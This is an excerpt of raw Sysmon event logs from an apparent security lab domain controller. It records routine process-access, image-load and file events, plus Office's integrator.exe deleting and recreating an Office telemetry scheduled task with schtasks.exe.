14:55:56.079{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EB7C-607E-8E0B-00000000BB01}6276C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.079{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EB7C-607E-8E0B-00000000BB01}6276C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000071959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.079{A7A01FEF-EB7C-607E-8E0B-00000000BB01}6276C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000071958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.079{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7C-607E-8E0B-00000000BB01}6276C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.063{A7A01FEF-EB7C-607E-8F0B-00000000BB01}48286656C:\Windows\system32\conhost.exe{A7A01FEF-EB7C-607E-8E0B-00000000BB01}6276C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.063{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB7C-607E-8F0B-00000000BB01}4828C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.063{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.063{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.063{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.063{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.063{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB7C-607E-8E0B-00000000BB01}6276C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.063{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165328C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7C-607E-8E0B-00000000BB01}6276C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9acd6|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e73a8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+14b46|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1403d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000071949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.066{A7A01FEF-EB7C-607E-8E0B-00000000BB01}6276C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Create /tn "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /XML "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 10341000x800000000000000071948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.048{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EB7C-607E-8C0B-00000000BB01}6344C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.048{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EB7C-607E-8C0B-00000000BB01}6344C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000071946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.048{A7A01FEF-EB7C-607E-8C0B-00000000BB01}6344C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000071945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.048{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7C-607E-8C0B-00000000BB01}6344C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.032{A7A01FEF-EB7C-607E-8D0B-00000000BB01}70245816C:\Windows\system32\conhost.exe{A7A01FEF-EB7C-607E-8C0B-00000000BB01}6344C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.032{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB7C-607E-8D0B-00000000BB01}7024C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.032{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.032{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.032{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.032{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.032{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB7C-607E-8C0B-00000000BB01}6344C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.032{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165328C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7C-607E-8C0B-00000000BB01}6344C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9ae91|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e6cd8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+14b46|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1403d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000071936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.034{A7A01FEF-EB7C-607E-8C0B-00000000BB01}6344C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Delete /F /tn "Microsoft\Office\OfficeTelemetryAgentFallBack2016"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 11241100x800000000000000071935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10532021-04-20 14:55:56.016{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn20162021-04-20 14:55:56.016 10341000x800000000000000071934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.016{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-8A0B-00000000BB01}3212C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.016{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-8A0B-00000000BB01}3212C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000071932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 